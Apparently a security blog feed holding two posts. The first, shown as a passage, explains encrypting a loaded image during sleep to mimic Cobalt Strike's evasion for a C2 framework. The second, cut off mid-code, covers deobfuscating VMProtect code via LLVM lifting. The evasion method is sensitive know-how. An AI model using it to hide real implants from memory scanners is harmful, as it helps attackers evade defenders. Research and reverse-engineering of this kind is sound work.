First, when we call functions in shellcode on x64, we need the stack to be 16 byte aligned. We borrow ParanoidNinja’s assembly snippet to do this, using it as the entry point for the shellcode, which then calls our run function, then returns to sleep.exe.

Next we need to consider calling Win32 APIs from our shellcode. We don’t have the luxury of just calling them as usual, since we don’t know their addresses and have no runtime support, so we need to resolve them ourselves. However, the usual method of calling GetProcAddress with a string of the function to resolve is tricky, as we already need to know the address of GetProcAddress to call it, and using strings in position-independent shellcode requires them to be spelled out in a char array like this: char MyFunc[] = { 'h', 'i', 0x0 };. What we can do instead is use the tried and true method of API hashing. I have borrowed a custom GetProcAddress implementation to do this from here, combining it with a slightly modified djb2 hash algorithm. Here’s how this looks for Sleep and VirtualProtect:

Function resolution in run.c

PE Parsing Fun

Now that we’re able to get the function pointers we need, it’s time to address encrypting the image. The way we’ll do this is by parsing the PE header of the loaded image, since it contains all the information we need to find each section in memory. After talking with Waldo-IRC, it turns out I could also have done with with VirtualQuery, which would make it a more generalizable process. However I did it the PE way, so that’s what I’ll cover here.

The first parameter of our argument struct to the shellcode is the base address of the loaded image in memory. This is effectively a pointer to the beginning of the MSDOS header. So we can use all the usual PE parsing techniques to find the beginning of the section headers. PE parsing can be tedious, so I won’t give a detailed play by play, just the highlights.

Once we have the address of the first section, we can get the three pieces of information we need from it. First is the actual address of the section in memory. The IMAGE_SECTION_HEADER structure contains a VirtualAddress field, which when combined with the image base address, gives us the actual address in memory of the section.

Next we need the size of that section in memory. This is stored in the VirtualSize field of the section header. However this size is not actually the real size of the section when mapped into memory. It’s the size of the actual data in the section. Since by default memory in Windows is allocated in pages of 4 kilobytes, the VirtualSize value is rounded up to the nearest multiple of 4k. The bit twiddling code to do this was taken from StackOverflow here.

The last piece of information about the section we need is the memory protection value. This is stored in the Characteristics field of the section header. This is a DWORD value that looks something like 0x40000040, with the left-most hex digit representing the read, write, or execute permission we care about. We do a little more bit twiddling to get just this value, by shifting it to the right by 28 bits. Once we get this value by itself, we save it in an array indexed by the section number so that we can reuse it later to reset the protections:

Shifting characteristics in run.c

Encryption

Now that we can find each section, know its size, and can restore its memory protections, we can finally encrypt. In the same loop where we parsed each section, we call our encryption function:

Shifting characteristics in run.c

The encryption/decryption functions take the address, size, and memory protection to apply, as well as a pointer to the address of the VirtualQuery function, so that we don’t have to resolve it each time:

Encrypt/decrypt functions in run.c

To encrypt, we change the memory protections to RW, then XOR each byte of the section. Once we have encrypted each section, we finish by encrypting the PE headers. They reside in a single 4k page starting at the base address. With that, the entire loaded image is encrypted!

Sleep and Decryption

Now that we’ve encrypted the entire image, we can sleep by calling the dynamically resolved Sleep function pointer, using the passed-in sleep duration DWORD.

Once we’ve finished sleeping, we decrypt everything. We have to make sure that we decrypt the PE headers page first, because we use it to find the addresses of all the other sections. Then we pop a message box to tell us we’re done, and return to sleep.exe!

Getting The Shellcode

ParanoidNinja covers this part in detail as well, but briefly the process is this:

- Compile the stack alignment assembly and the C code to an object file
- Link the two object files together into an EXE
- Use `objcopy` to extract just the `.text` into file
- Convert the shellcode file into a `char` array for `sleep.c`

Demo Time

To verify everything is being encrypted and decrypted properly, we can use Process Hacker to inspect the memory. Here I’ve called sleep.exe with a 5 second sleep time. The process has started, but since I haven’t pressed a key, everything is still unencrypted:

PE headers unencrypted

Here I have pressed a key and the encryption process has started. I have pressed “Re-Read” memory in Process Hacker, and you can see that the header page has been XOR encrypted:

PE headers encrypted

After the sleep is finished and decryption takes place, we get a message box telling us we’re done. Once we refresh the memory in Process Hacker, we can see we have the PE header page back again!

Demo complete

You can repeat this with each section in Process Hacker and see that they are all indeed encrypted.

Conclusion

I find it really educational to recreate Cobalt Strike features, and this one was no exception. I don’t know if this is at all close to how Cobalt Strike handles sleep obfuscation, but this does seem to be a viable method, and I will likely tweak it further and include it in my C2 framework. If you have any questions or input on this, please let me know or open an issue on Github.

Tickling VMProtect with LLVM: Part 1

By: fvrmatteo
8 September 2021 at 23:00

This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:

Foreword

First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.

  • In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I, hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
  • In 2018, a person nicknamed RYDB3RG, posted on Tuts4You a first insight on how LLVM optimizations could be beneficial when optimising VMProtected code. Although the easy example that was provided left me with a lot of questions on whether that approach would have been hassle-free or not.
  • In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.

The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.

Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.

With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.

I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.

Lifting

The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.

Lifting pipeline

Enough words or code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to make LLVM’s job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.

Liveness and aliasing information

Let’s start by saying that many deobfuscation tools are completely disregarding, or at best unsoundly handling, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM on the contrary is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally LLVM also has strong optimization passes benefiting from precise liveness information, that we absolutely want to take advantage of to clean any unnecessary stores to memory that are irrelevant after the execution of the virtualized code.

This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.

A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.

At a high level we can summarize the data-related virtual machine components as follows:

  • 30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.

  • 19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.

  • 16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won’t affect the others. Contrarily to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is also treated as the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.

  • 4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct with each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.

Helper functions

With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.

When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.

Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):

struct VirtualRegister final {
  union {
    alignas(1) struct {
      uint8_t b0;
      uint8_t b1;
      uint8_t b2;
      uint8_t b3;
      uint8_t b4;
      uint8_t b5;
      uint8_t b6;
      uint8_t b7;
    } byte;
    alignas(2) struct {
      uint16_t w0;
      uint16_t w1;
      uint16_t w2;
      uint16_t w3;
    } word;
    alignas(4) struct {
      uint32_t d0;
      uint32_t d1;
    } dword;
    alignas(8) uint64_t qword;
  } __attribute__((packed));
} __attribute__((packed));

using rref = size_t &__restrict__;

extern "C" uint8_t RAM[0];
extern "C" uint8_t GS[0];
extern "C" uint8_t FS[0];

extern "C"
size_t HelperStub(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR,
  rref vsp, rref vip,
  VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots);

extern "C"
size_t HelperFunction(
  rref rax, rref rbx, rref rcx,
  rref rdx, rref rsi, rref rdi,
  rref rbp, rref rsp, rref r8,
  rref r9, rref r10, rref r11,
  rref r12, rref r13, rref r14,
  rref r15, rref flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[19] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The VirtualRegister structure is meant to represent a VmRegister, divided in smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don’t necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64 bits bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.

The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions, that, once compiled to LLVM-IR, will generate a pointer parameter with a noalias attribute. The noalias attribute is hinting to the compiler that any memory access happening inside the function that is not dereferencing a pointer derived from the pointer parameter, is guaranteed not to alias with a memory access dereferencing a pointer derived from the pointer parameter.

The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.

The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.

The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.

The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.

The compiled and optimized LLVM-IR code for the described C++ definitions follows:

%struct.VirtualRegister = type { %union.anon }
%union.anon = type { i64 }
%struct.anon = type { i8, i8, i8, i8, i8, i8, i8, i8 }

@RAM = external local_unnamed_addr global [0 x i8], align 1
@GS = external local_unnamed_addr global [0 x i8], align 1
@FS = external local_unnamed_addr global [0 x i8], align 1

declare i64 @HelperStub(i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), i64, i64, i64, i64* nonnull align 8 dereferenceable(8), i64* nonnull align 8 dereferenceable(8), %struct.VirtualRegister*, i64*) local_unnamed_addr

define i64 @HelperFunction(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %vmregs = alloca [30 x %struct.VirtualRegister], align 16
  %slots = alloca [30 x i64], align 16
  %vip = alloca i64, align 8
  %0 = bitcast [30 x %struct.VirtualRegister]* %vmregs to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %0, i8 0, i64 240, i1 false)
  %1 = bitcast [30 x i64]* %slots to i8*
  call void @llvm.memset.p0i8.i64(i8* nonnull align 16 dereferenceable(240) %1, i8 0, i64 240, i1 false)
  %2 = bitcast i64* %vip to i8*
  store i64 0, i64* %vip, align 8
  %arraydecay = getelementptr inbounds [30 x %struct.VirtualRegister], [30 x %struct.VirtualRegister]* %vmregs, i64 0, i64 0
  %arraydecay1 = getelementptr inbounds [30 x i64], [30 x i64]* %slots, i64 0, i64 0
  %call = call i64 @HelperStub(i64* nonnull align 8 dereferenceable(8) %rax, i64* nonnull align 8 dereferenceable(8) %rbx, i64* nonnull align 8 dereferenceable(8) %rcx, i64* nonnull align 8 dereferenceable(8) %rdx, i64* nonnull align 8 dereferenceable(8) %rsi, i64* nonnull align 8 dereferenceable(8) %rdi, i64* nonnull align 8 dereferenceable(8) %rbp, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %r8, i64* nonnull align 8 dereferenceable(8) %r9, i64* nonnull align 8 dereferenceable(8) %r10, i64* nonnull align 8 dereferenceable(8) %r11, i64* nonnull align 8 dereferenceable(8) %r12, i64* nonnull align 8 dereferenceable(8) %r13, i64* nonnull align 8 dereferenceable(8) %r14, i64* nonnull align 8 dereferenceable(8) %r15, i64* nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 0, i64* nonnull align 8 dereferenceable(8) %rsp, i64* nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* nonnull %arraydecay, i64* nonnull %arraydecay1)
  ret i64 %call
}

Semantics of the handlers

We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.

The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.

STACK_PUSH

To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.

template <typename T> __attribute__((always_inline)) void STACK_PUSH(size_t &vsp, T value) {
  // Update the stack pointer
  vsp -= sizeof(T);
  // Store the value
  std::memcpy(&RAM[vsp], &value, sizeof(T));
}

We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.

STACK_POP

As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.

template <typename T> __attribute__((always_inline)) T STACK_POP(size_t &vsp) {
  // Fetch the value
  T value = 0;
  std::memcpy(&value, &RAM[vsp], sizeof(T));
  // Undefine the stack slot
  T undef = UNDEF<T>();
  std::memcpy(&RAM[vsp], &undef, sizeof(T));
  // Update the stack pointer
  vsp += sizeof(T);
  // Return the value
  return value;
}

We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.

ADD

Being a stack machine, we know that it is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back to the stack. There are four variations of the addition handler, meant to handle 8/16/32/64 bits operands, with the peculiarity that the 8 bits case is really popping 16 bits per operand off the stack and pushing a 16 bits result back to the stack to be consistent with the x64 push/pop alignment rules.

From what we just described the only thing we need is the virtual stack pointer, to be able to access the stack.

// ADD semantic

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool AF(T lhs, T rhs, T res) {
  return AuxCarryFlag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool PF(T res) {
  return ParityFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool ZF(T res) {
  return ZeroFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool SF(T res) {
  return SignFlag(res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool CF_ADD(T lhs, T rhs, T res) {
  return Carry<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
__attribute__((const))
bool OF_ADD(T lhs, T rhs, T res) {
  return Overflow<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
void ADD_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags
  bool cf = CF_ADD(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = OF_ADD(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);
}

template <typename T>
__attribute__((always_inline))
void ADD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Initialize the operands
  T op1 = 0;
  T op2 = 0;
  // Fetch the operands
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  }
  // Calculate the add
  T res = UAdd(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  ADD_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  }
  // 7. Save the flags
  STACK_PUSH<size_t>(vsp, flags);
}

DEFINE_SEMANTIC_64(ADD_64) = ADD<uint64_t>;
DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
DEFINE_SEMANTIC(ADD_16) = ADD<uint16_t>;
DEFINE_SEMANTIC(ADD_8) = ADD<uint8_t>;

We can see that the function definition is templated with a T parameter that is internally used to generate the properly-sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally we are taking care of truncating and zero extending the special 8 bits case. Finally, after the unsigned addition took place, we rely on Remill’s semantically proven flag computations to calculate the fresh flags before pushing them to the stack.

The other binary and arithmetic operations are implemented following the same structure, with the correct operands access and flag computations.

PUSH_VMREG

This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and the value of the VmRegister. The template is additionally defining the size of the pushed value and the offset from the VmRegister slot base.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void PUSH_VMREG(size_t &vsp, VirtualRegister vmreg) {
  // Update the stack pointer
  vsp -= ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
  // Select the proper element of the virtual register
  if constexpr (Size == 64) {
    std::memcpy(&RAM[vsp], &vmreg.qword, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d0, sizeof(uint32_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d1, sizeof(uint32_t));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.word.w0, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.word.w1, sizeof(uint16_t));
    } else if constexpr (Offset == 2) {
      std::memcpy(&RAM[vsp], &vmreg.word.w2, sizeof(uint16_t));
    } else if constexpr (Offset == 3) {
      std::memcpy(&RAM[vsp], &vmreg.word.w3, sizeof(uint16_t));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = ZExt(vmreg.byte.b0);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      uint16_t byte = ZExt(vmreg.byte.b1);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
}

DEFINE_SEMANTIC(PUSH_VMREG_8_LOW) = PUSH_VMREG<8, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_8_HIGH) = PUSH_VMREG<8, 1>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWLOW) = PUSH_VMREG<16, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWHIGH) = PUSH_VMREG<16, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHLOW) = PUSH_VMREG<16, 2>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHHIGH) = PUSH_VMREG<16, 3>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_LOW) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_32(POP_VMREG_32) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_HIGH) = PUSH_VMREG<32, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_64) = PUSH_VMREG<64, 0>;

We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.

POP_VMREG

This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are going to be the virtual stack pointer and a reference to the VmRegister to be updated. As before the template is defining the size of the popped value and the offset into the VmRegister slot.

template <size_t Size, size_t Offset>
__attribute__((always_inline)) void POP_VMREG(size_t &vsp, VirtualRegister &vmreg) {
  // Fetch and store the value on the virtual register
  if constexpr (Size == 64) {
    uint64_t value = 0;
    std::memcpy(&value, &RAM[vsp], sizeof(uint64_t));
    vmreg.qword = value;
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF00000000) | value);
    } else if constexpr (Offset == 1) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0x00000000FFFFFFFF) | UShl(ZExt(value), 32));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFFFFFF0000) | value);
    } else if constexpr (Offset == 1) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF0000FFFF) | UShl(ZExtTo<uint64_t>(value), 16));
    } else if constexpr (Offset == 2) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFF0000FFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 32));
    } else if constexpr (Offset == 3) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0x0000FFFFFFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 48));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b0 = Trunc(byte);
    } else if constexpr (Offset == 1) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b1 = Trunc(byte);
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
  // Clear the value on the stack
  if constexpr (Size == 64) {
    uint64_t undef = UNDEF<uint64_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    uint32_t undef = UNDEF<uint32_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint32_t));
  } else if constexpr (Size == 16) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  } else if constexpr (Size == 8) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  }
  // Update the stack pointer
  vsp += ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
}

DEFINE_SEMANTIC(POP_VMREG_8_LOW) = POP_VMREG<8, 0>;
DEFINE_SEMANTIC(POP_VMREG_8_HIGH) = POP_VMREG<8, 1>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWLOW) = POP_VMREG<16, 0>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWHIGH) = POP_VMREG<16, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHLOW) = POP_VMREG<16, 2>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHHIGH) = POP_VMREG<16, 3>;
DEFINE_SEMANTIC_64(POP_VMREG_32_LOW) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(POP_VMREG_32_HIGH) = POP_VMREG<32, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_64) = POP_VMREG<64, 0>;

In this case we can see that the update operation on the sub-chunks of the VmRegister is being done with some masking, shifting and zero extensions. This is to help LLVM with merging smaller integer values into a bigger integer value, whenever possible. As we saw in the STACK_POP operation, we are writing an undefined value to the current stack slot. Finally we are incrementing the virtual stack pointer.

LOAD and LOAD_GS

Generically speaking the LOAD handler is meant to pop an address from the stack, dereference it to load a value from one of the program segments and push the retrieved value to the top of the stack.

The following C++ snippet shows the implementation of a memory load from a generic memory pointer (e.g. SS or DS segments) and from the GS segment:

template <typename T> __attribute__((always_inline)) void LOAD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &RAM[address], sizeof(T));
  // Save the result
  if (isByte) {
